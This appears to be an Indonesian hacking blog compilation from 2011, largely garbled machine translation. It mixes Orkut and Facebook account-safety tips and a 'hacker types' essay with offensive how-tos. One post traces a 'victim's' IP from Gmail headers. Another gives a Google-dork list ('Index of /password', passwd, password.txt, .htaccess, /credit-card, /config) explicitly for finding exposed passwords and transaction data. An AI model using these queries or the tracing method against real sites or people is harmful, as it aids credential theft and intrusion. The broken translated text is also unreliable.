Setelah itu Anda dapat memeriksa apa semua halaman Anda sukai sejauh ini. Anda mungkin dicatat di sini bahwa ia akan meminta Anda untuk mengakses informasi Anda seperti semua aplikasi FB lainnya, dan aman untuk melakukannya.

Bagaimana untuk membuat Anda Aman orkut?

* Buat sandi yang sulit: Sementara "yourname123" selalu password menggoda untuk membuat, perlu diingat bahwa itu hanya sebagai mudah bagi pengguna jahat untuk mencari tahu karena bagi Anda untuk mengingat. Cobalah membuat password yang melibatkan kombinasi huruf dan angka yang tidak ada dengan mudah bisa menebak, bahkan jika mereka tahu rincian dasar tentang siapa Anda. Hal yang sama berlaku untuk pertanyaan keamanan Anda (pertanyaan yang muncul jika Anda lupa password Anda) - Anda harus mencoba yang terbaik untuk memilih pertanyaan yang hanya Anda yang bisa menjawab.

* Jaga rincian pribadi Anda pribadi: Jangan pernah berbagi username orkut dan password dengan teman atau di situs yang tidak diautentikasi oleh Google. orkut tidak mengizinkan situs eksternal untuk menyimpan informasi login orkut dan tidak akan pernah meminta Anda memasukkan di mana saja di luar halaman login orkut. Untuk berada di sisi aman, selalu periksa bahwa address bar Anda berbunyi "https://www.google.com/accounts/ServiceLogin ... ..?" Dan tidak ada lagi ketika berbagi orkut nama pengguna dan password.

* Biarkan pengkodean untuk para insinyur: Jangan copy dan paste kode ke address bar Anda, tidak peduli apa klaim untuk dapat melakukannya. Biasanya script ini benar-benar mengirim pesan (dalam nama Anda!) Ke teman Anda mencoba untuk mengelabui mereka agar memberi informasi pribadi mereka.

* Tidak Downloads di orkut: Jangan mendownload file dari orkut, terutama yang akhir bahwa dalam 'vb.' Atau 'exe.'. File ini seringkali virus yang dapat menginfeksi komputer Anda dan mulai mengirim ribuan pesan spam atas nama Anda. Situs yang menawarkan tema-tema khusus orkut atau kulit sangat berisiko.

* Berpikir dua kali tentang link eksternal: Link ke situs luar orkut yang muncul dalam memo atau posting belum diverifikasi oleh tim orkut, dan bisa membawa Anda ke situs berbahaya. Kami merekomendasikan hanya mengklik link yang pergi ke situs terpercaya atau mereka yang berasal dari pengguna orkut lain yang Anda kenal baik.

* Anti-Virus perangkat lunak selalu baik: Bahkan pengguna yang paling teliti orkut dapat menjadi korban serangan phishing, jadi penting untuk selalu waspada dan siap. Reguler pemindaian komputer Anda dengan update anti-virus software adalah cara terbaik untuk menjaga komputer Anda aman. Saya Sarankan Avast Anti virus (versi terbaru), aman & mendapatkan sebagian besar Virus / Trojan dll!

* Untuk fitur baru orkut, periksa aplikasi: Kadang-kadang sebuah situs tidak resmi dapat mengklaim untuk menawarkan fitur-fitur khusus orkut, namun situs ini dikenal untuk mengambil alih account orkut dan langsung melanggar Persyaratan Layanan kami!. Jika Anda mencari kesenangan fungsi orkut baru, memeriksa ribuan aplikasi yang orkut telah tersedia. Semua aplikasi ini telah dibangun oleh pengembang berbakat sesuai dengan standar yang kami percaya akan membantu untuk menjaga keamanan Anda saat online.Jika Anda belum mengunjungi direktori aplikasi baru, kita lihat-Anda mungkin akan terkejut betapa banyak barang keren yang Anda temukan.

Bersenang-senang dengan google-GOOGLE SPHERE

Google adalah salah satu mesin pencari paling populer di dunia. Google pada dasarnya untuk mencari tetapi Anda bisa bersenang-senang dengan Google. Sekarang di sini adalah trik google menyenangkan ....


Sphere Google - Sphere Google adalah trik yang menyenangkan. Ini akan mulai berputars emua link di google di dalam bola. Anda dapat mengubah rotasi dari bola dengan menggerakkan kursor. Its untuk pencarian gambar.

ok ... mari kita mulai ....

1. Buka home page Google ...

2. Pada tipe kotak Pencarian Google .. bola ....

3. Sekarang Klik pada tombol saya merasa beruntung ...

ok .. u dilakukan sekarang memutar mouse pada layar dan lihat hasilnya ... ....
atau anda bisa klik di sini

Aman Facebook Account dari hacker

Facebook selalu di bagian atas daftar Hacker karena popularitas yang besar, mudah untuk digunakan, menghubungkan sejumlah besar orang, koleksi besar aplikasi, lebih banyak. Facebook diluncurkan pada tahun 2004, per Januari 2011, memiliki lebih dari 600 juta pengguna aktif. Seorang hacker bisa mendapatkan informasi yang berguna tentang siapa saja dengan Hacking Rekening nya Facebook dan dapat menghancurkan siapapun kehidupan sosial dengan itu. Karena sejumlah besar serangan di Facebook sehari-hari, mereka berusaha untuk sangat mengamankan data dari penyerang. Banyak fitur keamanan baru yang mengagumkan telah dibangun untuk mengamankan para penggunanya, namun selalu ada celah.

Beberapa hari sebelum Facebook telah membangun fitur keamanan baru, itu adalah Login Persetujuan mirip dengan 2-Langkah Verifikasi. Seperti telah saya sebutkan posting tentang 2-Langkah verifikasi, jika Anda telah membaca posting itu maka anda harus memiliki beberapa pengetahuan tentang hal itu. Anyways kembali ke pos.

Apa Persetujuan Login?

Persetujuan login opt-in fitur keamanan yang sama untuk Login Pemberitahuan, tetapi dengan langkah keamanan tambahan. Dengan Persetujuan Login, setiap kali Anda mencoba untuk mengakses account Facebook Anda dari perangkat yang belum diakui (ex: komputer atau telepon Anda belum diberi nama dan disimpan ke akun Facebook Anda mobile), pertama anda harus memasukkan kode keamanan yang telah dikirim ke ponsel Anda.

Cara mengaktifkan Persetujuan Login?

Untuk mengaktifkan Persetujuan Login di Facebook

Pergi ke halaman Pengaturan Account dan pilih opsi perubahan sebelah Keamanan Account.
Centang kotak di bawah Persetujuan Login (Jika Anda tidak memiliki nomor ponsel terhubung ke account Facebook Anda, Anda akan perlu menambahkan satu).
Jika Anda belum bernama perangkat Anda, Anda akan diminta untuk melakukannya ketika Anda menghidupkan Persetujuan Login. Jangan klik tombol "Simpan perangkat ini" pilihan jika Anda menggunakan perangkat umum (ex: telepon teman, sebuah komputer perpustakaan). Perhatikan bahwa semua perangkat terhubung ke account Facebook Anda (ex: perangkat Anda diakui) terdaftar di bawah bagian Login Persetujuan.
Apa yang akan terjadi setelah menyalakan Persetujuan Login?
Setelah mengaktifkan fitur ini setiap kali Anda akan login ke Account Facebook Anda dari perangkat tidak dikenal lain Anda akan meminta untuk memasukkan kode keamanan yang akan dikirim ke ponsel Anda.
Anda akan melihat sesuatu seperti ini:

Bagaimana untuk menemukan alamat IP dari pengirim email di Gmail

Ketika satu Beberapa mengirimkan surat fack .. jika u ingin hack seseorang .. dari yang Anda butuhkan alamat ip dari Korban Anda / musuh .. Berikut adalah trik untukmenemukan Ip dari Gmail .. ok mari kita mulai ....
1. Masuk ke account Gmail Anda dengan username dan password.
2. Sekarang pindahkan dari Kotak masuk dan Buka Email Anda Korban Anda ...
3. Sekarang langkah ketiga adalah ... Klik pada segitiga terbalik Balasan samping. dan kemudian Pilih Show Original.

4. Sekarang Klik pada Show Original daripada Tampilkan Kode terlihat seperti ini ...!.!
5. Sekarang menemukan Diterima: dari dan Tampilkan IP Pengirim ... terlihat seperti ini
Received: from mr.google.com ([10.204.75.142])

6. Sekarang Salin alamat IP dan ... pindah ke situs ini ...
http://www.ip-adress.com/ip_tracer/
ok Anda lakukan ... u jejak Anda Korban ... ..
jika u memiliki masalah dalam proses ini daripada Komentar saya ....

Sabtu, 15 Oktober 2011

Jenis Hacker




Apa itu Hacker?
- Hacker adalah Orang seperti Anda / saya yang mencoba untuk mendapatkan akses tidak sah dalam Sistem menggunakan Beberapa Program dan Software.
ok ... saya pikir Anda semua mengerti apa yang hacker .. untuk definisi yang jelas dan baik Google lebih baik. ok ... mari kita mulai meninggalkan jenis hacker ...
* Beberapa waktu ketika ada orang meminta Anda jenis hacker dari .. semua yang Anda / saya katakan hacker, hacker dll .. Sistem Etis tetapi dalam dunia nyata hacker memiliki tiga jenis ..
Gray Hat Hacker

Seorang hacker topi abu-abu adalah seseorang yang berada di antara dua konsep. Dia mungkin menggunakan keterampilan untuk tindakan legal atau ilegal, tetapi tidak untuk keuntungan pribadi. Abu-abu hacker menggunakan keahlian mereka dalamUntuk membuktikan diri bahwa mereka dapat mencapai suatu prestasi ditentukan, tetapi tidak pernah melakukan itu dalam rangka untuk membuat uang dari itu. Saat mereka melintasi batas itu, mereka menjadi hacker hitam.
Misalnya, mereka mungkin hack jaringan komputer dari lembaga publik, mari kita katakan, NOAA. Itu adalah crime.If federal berwenang menangkap mereka, mereka akan merasa lengan panjang keadilan. Namun, jika mereka hanya mendapatkan dalam, dan post, mari kita katakan, menangani mereka, dan keluar tanpa menyebabkan jenis kerusakan, maka mereka dapat dianggap hacker abu-abu.
Jika Anda ingin tahu lebih banyak tentang hacker, maka Anda dapat menghadiri salah satu konvensi tahunan mereka. Setiap tahun, hacker dari seluruh Amerika Serikat, dan dari berbagai belahan dunia, menyatukan dan bertemu di DEF CON. Konvensi-konvensi ini banyak setuju. Dalam yang terakhir, 6.600 orang menghadiri itu.
Setiap tahun, DEF CON dirayakan di Las Vegas, Nevada. Namun, hacker bukan satu-satunya yang pergi ke acara ini. Ada juga komputer wartawan, profesional keamanan komputer, pengacara, dan karyawan pemerintah federal. Acara ini disusun oleh trek yang berbeda, semuanya terkait, dalam beberapa cara, ke dunia hacker (keamanan komputer, worm, virus, teknologi baru, coding, dll). Selain trek, ada kontes yang melibatkan komputer hacking, l memilih Ock dan kegiatan yang terkait bahkan robot. Etika hacking, hacker topi putih atau apapun nama yang ingin Anda gunakan, pada akhirnya, itu memiliki tujuan: untuk melindungi sistem organisasi, publik atau swasta, di seluruh dunia. Setelah semua, hacker sekarang dapat ditemukan di mana saja, dan mereka dapat dihitung oleh jutaan. Segera, konsep-konsep seperti topi putih, sistem linux operasi atau topi abu-abu akan menjadi pengetahuan umum. Sebuah bukti nyata bagaimana masyarakat kita banyak yang telah dipengaruhi oleh teknologi.
White Hat Hacker

Menurut Hollywood, seorang hacker dapat menjadi anak yang jenius yang menghabiskan terlalu banyak waktu dengan komputer dan tiba-tiba menemukan dirinya tenggelam dalam dunia cyber-keamanan atau konspirator kriminal. Di sisi lain, ia bisa menjadi penjahat kawakan yang ingin mendapatkan uang dalam jumlah besar baginya, atau bahkan lebih buruk, mendominasi dunia.Dalam film Matrix, konsep hacker berubah sedikit. Meskipun agen Matrix menganggap mereka teroris, kebenaran adalah bahwa mereka pemberontak berjuang untuk kebebasan kemanusiaan. Hal-hal tidak perlu untuk mencapai yang ekstrim, meskipun.Kami tidak berperang dengan cerdas ma Chines sehingga jenis skenario adalah sedikit dramatis.
Oleh karena itu, hacker adalah seseorang yang mampu memodifikasi perangkat keras komputer, atau perangkat lunak. Mereka membuat penampilan mereka sebelum munculnya komputer, ketika menentukan individu yang tertarik dengan kemungkinan memodifikasi mesin. Misalnya, memasukkan menentukan kode di telepon untuk membuat panggilan internasional gratis.
Ketika komputer muncul, ini orang menemukan sebuah dunia baru di mana mereka bisa memanfaatkan keterampilan mereka. Sekarang mereka tidak terbatas pada kendala dari dunia fisik, sebagai gantinya, mereka bisa melakukan perjalanan melalui dunia maya komputer. Sebelum internet, mereka menggunakan Bulletin Board System (BBS) untuk berkomunikasi dan bertukar informasi. Namun, ledakan yang sesungguhnya terjadi ketika Internet muncul.
Hari ini, siapapun dapat menjadi seorang hacker. Dalam denominasi itu, ada tiga jenis hacker. Yang pertama adalah hacker hitam, juga dikenal sebagai cracker, seseorang yang menggunakan pengetahuan komputer di ities activ pidana guna memperoleh keuntungan pribadi. Sebuah contoh khas adalah orang yang memanfaatkan kelemahan dari sistem lembaga keuangan untuk membuat uang.
Di sisi lain adalah hacker topi putih. Meskipun hacker topi putih dapat dianggap sama dengan seorang hacker hitam, ada perbedaan penting. Seorang hacker putih melakukannya dengan tidak ada niat kriminal dalam pikiran. Perusahaan di seluruh dunia, yang ingin menguji sistem mereka, kontrak hacker putih. Mereka akan menguji seberapa aman sistem mereka, dan setiap titik kesalahan yang mereka dapat ditemukan. Jika Anda ingin menjadi seorang hacker dengan topi putih, linux, PC dan koneksi internet adalah semua yang Anda butuhkan.
Black Hat Hacker
Terima kasih ke Hollywood, hacker topi hitam telah menjadi gambar ikon dari semua hacker di seluruh dunia. Bagi sebagian pengguna komputer, kata hacker telah menjadi sinonim untuk secara sosial dan kriminal.Tentu saja, itu adalah ketidakadilan yang diciptakan oleh penafsiran kita sendiri tentang media massa, sehingga sangat penting bagi kita untuk mempelajari apa hacker dan apa seorang hacker hitam (atau cracker) tidak. Jadi, mari kita belajar tentang teknik topi hitam dan bagaimana mereka membuat hidup kita sedikit lebih sulit.
Apakah Hacking Black Hat?
Seorang hacker topi hitam, juga dikenal sebagai cracker atau hacker sisi gelap (ini definisi terakhir adalah referensi langsung ke bioskop Star Wars dan sisi gelap gaya), adalah seseorang yang menggunakan keahliannya dengan maksud kriminal. Beberapa contoh adalah: rekening bank retak untuk membuat transferences ke rekening mereka sendiri, mencuri informasi yang akan dijual di pasar gelap, atau menyerang jaringan komputer sebuah organisasi untuk uang.
Beberapa kasus terkenal hacking topi hitam termasuk Kevin Mitnick, hacker yang menggunakan topi hitam keterampilan untuk memasuki komputer organisasi seperti Nokia, Fujitsu, Motorola dan Sun Microsystems (harus disebutkan bahwa ia sekarang seorang hacker topi putih); Kevin Poulsen, yang mengambil alih semua saluran telepon di Los Angeles dalam rangka untuk memenangkan kontes radio (hadiah adalah 944 Porsche S2), dan Vladimir Levin, yang merupakan pegangan dalang di balik pencurian $ 10'000, 000 Citigroup .
Perbedaan Antara White Hat Hacker Dan A Black Hat
Perbedaan antara hacker topi hitam dan topi putih adalah bahwa hacker topi putih menggunakan keterampilan dan pengetahuan sebagai cara untuk mempertahankan seseorang dari penyerang. Itu berarti bahwa hacker topi putih menawarkan jasa mereka untuk perusahaan, organisasi publik dan lembaga pendidikan.
Layanan tersebut meliputi revisi lengkap dari keamanan jaringan komputer mereka, implementasi sistem keamanan baru (mereka mungkin perangkat keras atau perangkat lunak), pelatihan pengguna dan rekomendasi masa depan. Semua tindakan ini akan mampu memerangi hacker yang tidak sah; hacker topi hitam, bagaimanapun, akan terus mencoba.

What Are The Basics Needed To Become A Hacker?

Setiap orang telah mendengar dari satu individu atau lainnya yang tertangkap saatkomputer hacking yang milik organisasi ini atau itu. Karena hacking ke dalam komputersangat ilegal, harus disebutkan bahwa artikel ini tidak akan menyebutkan secara spesifiknyata tentang subjek, dan penulis dengan senang hati ini akan lebih mendorong Andauntuk menjadi seorang hacker sejati - profesional.


Artikel ini, namun akan, memberikan gambaran singkat dari hacker kriminal, beberapametode mereka, dan beberapa hal yang dapat Anda lakukan untuk membuat komputer Anda sendiri lebih aman dari serangan hack. Berikut adalah hal-hal yang Anda perlu belajar tentang bagaimana menjadi seorang hacker.

belajar Komputer

Ia harus pergi tanpa mengatakan bahwa hal pertama yang diperlukan adalah untuk belajar tentang komputer. Ini berarti belajar. Banyak membaca yang terlibat bersama dengan sekadar kuno belajar bagaimana menggunakan komputer. Kemudian, tentu saja, ada aspek-aspek khusus dari studi komputer. Tempat-tempat dimana tips dipelajarisering dua kali lipat: seorang teman yang memiliki akses ke komputer, dan berbagaitempat di Web. Tapi ini juga merupakan hal yang menarik - jika orang muda memiliki kemampuan untuk belajar, dan ingin belajar dapat menggunakan tutorial-maka hackermengapa tidak mengambil waktu untuk mempelajari hal yang benar - hal yang bisa mendapatkan dia banyak uang dalam legit dunia? Apakah mungkin bahwa hal itu bisamenjadi teman dia bahwa ternyata dia jauh dari baik?

Pelajari Website

Khusus web situs hacker, di mana hacker berkumpul, ada di Web - seperti halnya setiap kelompok lain yang dikenal orang - baik legal maupun ilegal. Beberapa diketahui chat room hacker, forum hacker, dan situs hacker biasa.

Pelajari Rahasia

Hal ini di situs-situs Web, dan mungkin beberapa orang bahwa ia mungkin bertemu,mungkin hanya online, di mana ia akan mempelajari dasar-dasar hacking, dan belajarcara hack.

Senin, 05 September 2011

Memeriksa nama Subdomain

Sintaks : inurl:namasitus.com-www
Misalnya, anda ingin mengetahui subdomain apa saja yang terdapat pada astaga.com. maka sintaksnya adalah:inurl:astaga.com www.
Hasilnya adalah nama astaga.com tanpa ada embel-embel www.
Selain menggunakan sintaks diatas anda juga bisa menggunakan sintak seperti modifikasi berikut:
Site:namasitus.com-site:www.namasitus.com

Index of

Apa yang ditampilkan oleh sintaks index of ini disebut sebagai directory listing. Ada banyak informasi yang bisa anda  dapatkan dalam directory listing tersebut. Diantarnya adalah:
Kesalahan konfigurasi yang terdapat pada server
Menampilkan daftar file yang terdapat pada situs tersebut
Memberikan informasi yang tidak diketahui pada halaman web biasa

Melalui  browsing index tersebut maka setiap orang yang masuk dapat melakukan browse pada direktori local.  Tentu saja hal ini tidaklah baik untuk keamanan server. Sebab seseorang bisa saja menemukan berbagai informasi sensitif termasuk password. Tentu saja informasi seperti tersebut tidak akan bisa diperoleh dengan cara searching biasa.

Sintaks:Index of
Fungsi untuk mendapatkan situs yang menampilkan index browsing directory.
Pada umumnya, jika sebuah webserver yang index browsing-nya dapa di akses maka dapat diakses pula oleh user umum , layaknya sebuah local decirtory. Sehingga index of di sini lebih berguna untuk menghubungkan webserver yang memiliki index directory yang bisa diakses. Pemakaian index of ini nantinya dapat pula dimanfaatkan untuk mencari informasi yang sensitif dan penting seperti sebuah transaksi online atau bahakan sebuah password. Kalau uadah dapat, jangan bilang siapa siapa ya.
Contoh pemakaian index of
  • Index of /admin
  • Index of /password
  • Index of /pass
  • Index of /mail
  • \“Index of /backup”
  • \“Index of /\”+passwd
  • \“Index of /\”+password.txt
  • \“Index of /\”+.htaccess
  • \“Index of /secret\”
  • \“Index of /root\”
  • \“Index of /cgi-bin\”
  • \“Index of /confidential\”
  • \“Index of /credit-card\”
  • \“Index of /logs\”
  • \“Index of /config\”
  • \“Index of /admin.asp
  • \“Index of /login.asp

O iya, perlu saya sampaikan bahwa kegiatan hacking bukanlah kegiatan instan melainkan di perlukan juga sebab kesabaran. Sebab, bisa saja anda menemukan sebuah index directory menarik. Ternyata hasilnya bukan yang Anda harapkan. Jadi salah satu kunci sukses kegiatan hacking memiliki sifat sabar yang sabar.

Minggu, 28 Agustus 2011

Info:


Fungsi: untuk menampilkan informasi dai Google mengenai situs yang dicari.
Contoh, info:namasitus.com
Dari berbagai sintaks yang telah Anda peajari tersebut, Anda dpat Menggabungkannya sesuai dengan kerperluan. Melalui proses penggabungan tersebu, akan diperoleh hasil yang lebih akurat serta mengurangi tingkat kesalahan. Anda dapat pula mengkombinasikan sintaks tersebut Anda pelajari tersebut dengan Boolean ataupun operator yang telah Anda pelajari .

Berikut ini adalah beberapa  query menarik yang perlu Anda coba dalam Aktivitaas Google Hacking ini. Query ini bisa Anda masukkan tanpa harus menggunakan sintaks khusus. Melainkan, hanyalahsebuah permainan kata-kata untuk memanipulasi hasil pencarian. Diantaranya adalah :
“access denied for user” “using password”
“Chatologica MetaSearch” “stack tracking:”

Define:


Fungsi: sintaks ini berguna untuk menampilkan definisi sebuah kata atau frase.
Perlu diketahui bahwa semua kata yang diketik setelah sintaks ini akan dianggap satu frase.
Contoh:”define:hacker” (tanpa tanda kutip)
Hasilnya adalah definisi atau pengertian hacker menurut beberapa situs dan ahli.

Intext:


Fungsi menampilkan hasil pencarian yang berpa kata-kata pada body situs tertentu. Pemakian sintaks ini akan mengabaikan link, URL, dan judul halaman.
Contoh: “intext:admin”(tanpa tanda kutip)
Hasilnya adalah halaman yang mengandung link pada situs yang memiliki kata kunci admin. Sintaks intext:Administratorlogin atau allintext:Administrator login.